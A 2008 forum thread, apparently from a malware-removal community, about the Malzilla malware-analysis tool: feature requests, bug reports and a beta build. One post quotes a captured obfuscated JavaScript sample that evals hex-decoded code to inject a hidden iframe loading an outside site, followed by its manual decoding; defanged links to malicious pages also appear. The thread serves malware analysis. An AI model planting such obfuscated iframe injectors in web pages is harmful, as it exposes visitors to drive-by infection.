Author Topic: MalZilla  (Read 301201 times)

0 Members and 1 Guest are viewing this topic.

April 14, 2008, 11:40:27 pm
Reply #105

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
Another feature request:

How about associating hxxp with malzilla so that we can embed hxxp links in webpages and have them automatically load up with malzilla? That'll save us from having to do lots of copy/pasting from MDL (and other sites) into Malzilla :P

Just another random idea for after your vacations :)

TJS

April 15, 2008, 01:39:04 pm
Reply #106

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
 :-[ I only found out about Malzilla yesterday, its certainly more efficent than Lynx, and i love the decoding functions, sure beats doing it the hard way.

An idea, were seeing more and more FTP RFIs than just a few months ago, any possibility of porting Malzilla for FTP grabs ?
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

April 15, 2008, 03:06:26 pm
Reply #107

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
@tjs
Doesn't the Clipboard monitor do the job similar to what you request?

@Orac
I'll do something about FTP grabs, but I can do it when I come back from the vacancy.

April 15, 2008, 04:08:11 pm
Reply #108

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
I've had a few bad experiences with the clipboard monitor so I haven't experimented with it too much. I'll check it out.

April 15, 2008, 07:16:00 pm
Reply #109

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Clipboard monitor can be annoying sometimes.
It monitors clipboard for links (keywords can be defined on Settings tab).

In the beginning, it was a problem that he grabbed all the links twice (double entries in the list).
I've solved that by clearing the clipboard after getting the links.
Solution for Malzilla, but it was a problem for other apps running.

Now, it does not clear the clipboard (other apps should not experience problems while Malzilla is running), but it tries to detect double entries and delete them from the list.

The current problem now is that Clipboard Monitor does also detect internal copy/paste of links inside Malzilla (I do not find this useful) as Malzilla is using the Windows' clipboard.

April 18, 2008, 07:50:43 pm
Reply #110

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Sorry guys, I didn't succeed in preparing the new release before I go to vacancy (tomorrow morning).
It is full with half-backed functions, and I would not like to upload it in such state.

See you in 3 weeks (3 weeks without a PC :) ).

April 18, 2008, 07:52:16 pm
Reply #111

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Have fun dude :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 18, 2008, 07:56:36 pm
Reply #112

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Have a nice time away :)

April 18, 2008, 08:16:46 pm
Reply #113

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Thanks guys.

The following is not official release (but you can get it if you want to try it):
http://rapidshare.com/files/108547702/malzilla.exe.html
You will need the dll files from the latest official version of Malzilla:
http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=242804&release_id=587544

Whats is half-backed:
- you will see "Run script" in right-click menu (works on selected text, or on whole text if no selection is made). Internal scripts are working, external are not implemented at all
- the state of "Use referrer" on Download page is not saved in INI file for the next session
- Download panel - button panels can be hidden (click anywhere between the buttons) to extend the space for downloaded source and HTTP headers. There is problems with some combinations of resizing the form and hide/unhide the panels - buttons are not always restored to the right position
- some JavaScripts can break Malzilla if "Debug" is used. It does not break if "Run script" is used. It manifests in cleaning all the settings, URL history etc. This bug affects all the previous versions of Malzilla. I can't do a lot here, except of preventing Malzilla to overwrite the settings files with empty ones. This is not an exploit for Malzilla. It is just that Debugger does not finish working (gets stuck), and you need to kill Malzilla. Malzilla will receive the termination signal, and it will do the closing operations (saving settings) which are empty because the thread containing the settings (GUI) is not responding. All the settings files will be overwritten with empty files.

There may be something else that I can't recall at the moment.

Cheers,
bobby

April 19, 2008, 02:25:47 pm
Reply #114

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Hope you have a great vacation Bobby

Ive had another idea for Malzilla, within the HTTP header section adding the resloved DNS and connection information would be very helpful, especailly when faced with redirects. example
Quote
Resolving ess.trix.net... 200.201.192.41, 200.201.192.31
Connecting to ess.trix.net[200.201.192.41]:80... failed: No route to host.
Connecting to ess.trix.net[200.201.192.31]:80... connected.
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

April 29, 2008, 06:01:37 pm
Reply #115

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
Looks like SANS is now using Malzilla as part of their training
http://www.sans.org/training/description.php?mid=54

TJS

May 10, 2008, 03:05:22 am
Reply #116

jimmyleo

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 29
hi bobby:

Code: [Select]
<script>
ADDE21259CAE84 = "parseIn";
ADDE21259CAE84 += "t";
A3CB8FA3E0 = "String.fr";
A3CB8FA3E0 += "omC";
A3CB8FA3E0 += "h";
A3CB8FA3E0 += "a";
A3CB8FA3E0 += "rCode";
function DAC027B90(EAA256797A)
{
    var D8BE9398766CD = 676;
    D8BE9398766CD = D8BE9398766CD - 660;
    D59FA5 = eval(ADDE21259CAE84 + "(EAA256797A,D8BE9398766CD)");
    return (D59FA5);
}
function B06AA5(B08FD4DEDD6A39)
{
    var E24A10 = 122;
    E24A10 = E24A10 - 120;
    var D7502F1FF7C = "";
    for (FECA5EB378C6D0E = 0; FECA5EB378C6D0E < B08FD4DEDD6A39.length; FECA5EB378C6D0E += E24A10)
    {
        D7502F1FF7C += ( eval(A3CB8FA3E0 + "(DAC027B90(B08FD4DEDD6A39.substr(FECA5EB378C6D0E,E24A10)))"));
    }
    eval(D7502F1FF7C);
}
B06AA5("76796E3D646F63756D656E742E676574456C656D656E744279496428276B696727293B69662876796E3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D6B6967207372633D687474703A2F2F7665726F7373612E696E666F207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D");
</script>

this script may caused Malzilla's decoder as "Working..." state. I choose replace eval() with method and filled in document.write as you know.
but it keeps this state..

and I decode it manually.
Code: [Select]
vyn=document.getElementById('kig');
if(vyn==null)
{
         document.write('<iframe id=kig src=http://verossa.info style=display:none></iframe>');
}

May 10, 2008, 08:35:08 pm
Reply #117

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Hi jimmyleo,

Use last build and chose "Leave as is" option. You will get the same result like the one you got manually.

May 16, 2008, 02:32:25 pm
Reply #118

jimmyleo

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 29
yeap, got it ;D

and another bug? maybe

link following:
Code: [Select]
hxxp://xindizhi88.com/ai/Yes.htm
jsencode, at first glance. and MZ only decode part of it, and remain is messy characters.

jimi :)

May 16, 2008, 04:33:14 pm
Reply #119

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Thanks for reporting this bug.
It has something to do with conversion between ASCII and Unicode.
The script decodes OK until first non-English character appears, and it goes into a mess after that.

Please use this online JScript.encode decoder until I get this bug fixed:
http://www.greymagic.com/security/tools/decoder/decoder.asp